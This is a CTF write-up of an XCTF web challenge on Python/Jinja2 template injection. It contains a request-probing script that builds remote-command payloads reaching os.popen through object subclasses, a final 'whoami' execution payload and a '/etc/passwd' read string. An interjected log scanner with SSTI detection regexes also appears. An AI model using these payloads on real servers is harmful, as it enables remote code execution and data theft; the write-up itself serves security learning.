XCTF (攻防世界) - web: Web_python_template_injection
阿新 • Published: 2021-11-03
Challenge description
None given
Challenge screenshot
Approach
The challenge hint says this is a Python template injection.
Try requesting a path that does not exist and look at the 404 page.
Then use that non-existent path to test for template injection.
Construct the following request:
http://111.200.241.244:59411/{{1+1}}
The response shows the result of evaluating 1+1, so the path is reflected into a template and a template injection point exists.
Next, write a Python script that probes the injection point and looks for payloads that can execute commands:
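As an added example for the defender side (not part of the original writeup), here is a small log scanner that flags requests like the probe above: paths containing Jinja2 delimiters or the dunder attribute walk the later payloads use. The access-log lines, IPs and timestamps are constructed for this example.

```python
"""Flag server-side template injection (SSTI) probes in web access logs (stdlib only)."""
import re
from urllib.parse import unquote

# Constructed sample log in common log format; not real traffic from the challenge server.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Nov/2021:10:00:01 +0800] "GET /index HTTP/1.1" 200 512
10.0.0.7 - - [03/Nov/2021:10:00:02 +0800] "GET /{{1+1}} HTTP/1.1" 404 180
10.0.0.7 - - [03/Nov/2021:10:00:03 +0800] "GET /%7B%7B%5B%5D.__class__.__base__.__subclasses__()%7D%7D HTTP/1.1" 404 2048
10.0.0.9 - - [03/Nov/2021:10:00:04 +0800] "GET /static/app.js HTTP/1.1" 200 7000
10.0.0.7 - - [03/Nov/2021:10:00:05 +0800] "GET /{%25%20for%20x%20in%20y%20%25} HTTP/1.1" 404 180
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Jinja2 expression/statement delimiters, and the dunder names used to walk from a
# literal to the object class and its subclasses (as in the writeup's probe payloads).
TEMPLATE_SYNTAX = re.compile(r'\{\{.*?\}\}|\{%.*?%\}', re.S)
DUNDER_WALK = re.compile(r'__(class|base|mro|subclasses|globals|init|builtins)__')


def classify_path(raw_path):
    """Return the reasons a request path looks like an SSTI probe; empty list if benign."""
    path = unquote(unquote(raw_path))  # decode twice so double-encoded probes are caught too
    reasons = []
    if TEMPLATE_SYNTAX.search(path):
        reasons.append("template-delimiters")
    if DUNDER_WALK.search(path):
        reasons.append("dunder-walk")
    return reasons


def scan_log(text):
    """Return (ip, status, decoded path, reasons) for every suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        reasons = classify_path(m["path"])
        if reasons:
            hits.append((m["ip"], int(m["status"]), unquote(m["path"]), reasons))
    return hits


if __name__ == "__main__":
    for ip, status, path, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {path!r} -> {', '.join(reasons)}")
```

A burst of 404s from one client whose paths match both categories is a strong signal that someone is probing a reflected template, which is exactly the pattern this challenge exhibits.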
```python
#coding:utf8
import requests
import re
import html

# The injection point: the requested path is reflected into the 404 page's template.
url = "http://111.200.241.244:59411/{{%s}}"

def GetRes(payload):
    """Send one payload and return the evaluated text reflected in the 404 page."""
    try:
        t = requests.get(url%(payload)).text
        reg = '111.200.241.244:59411/(.+?) not found'
        return [html.unescape(i) for i in re.findall(reg,t)]
    except requests.RequestException:
        return []

def TestObj():
    # Literals to start from, and attribute chains that lead from them to the base object class.
    m = [{"name":'[]',"key":[]},{"name":'()',"key":()},{"name":'""',"key":""},{"name":'\'\'',"key":''},{"name":'{}',"key":{}}]
    pay = [".__class__.__base__",".__class__.__mro__[1]",".__class__.__mro__[2]"]
    for i in m:
        for j in pay:
            p = GetRes(i["name"]+j+'.__name__')
            for k in p:
                if k == 'object':
                    # Enumerate the subclasses of object and check each index for usable classes.
                    s = GetRes(i["name"]+j+'.__subclasses__()')
                    if not s:
                        continue
                    s = s[0].split(',')
                    for g in range(len(s)):
                        if '\'file\'' in s[g]:
                            print(i["name"]+j+'.__subclasses__()[%s]'%(g)+'(\'/etc/passwd\').read()')
                        q = GetRes(i["name"]+j+'.__subclasses__()[%s].__init__'%(g))
                        for t in q:
                            if '_Printer' in t:
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.__globals__[\'os\'].system(\'whoami\')')
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.__globals__[\'os\'].popen(\'whoami\').read()')
                            if 'Quitter' in t:
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.__globals__[\'os\'].system(\'whoami\')')
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.__globals__[\'os\'].popen(\'whoami\').read()')
                            if 'func_globals' in t:
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.func_globals.linecache.os.popen(\'id\').read()')
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.func_globals[\'linecache\'].os.popen(\'whoami\').read()')
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.func_globals[\'linecache\'].__dict__[\'o\'+\'s\'].__dict__[\'sy\'+\'stem\'](\'ls\')')

TestObj()
```
The script's output is as follows:
Pick any of the printed payloads to run a command; here we use the following one:
[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen('whoami').read()
Replace whoami with any other command.
List the directory:
The flag file is found.
Read the flag.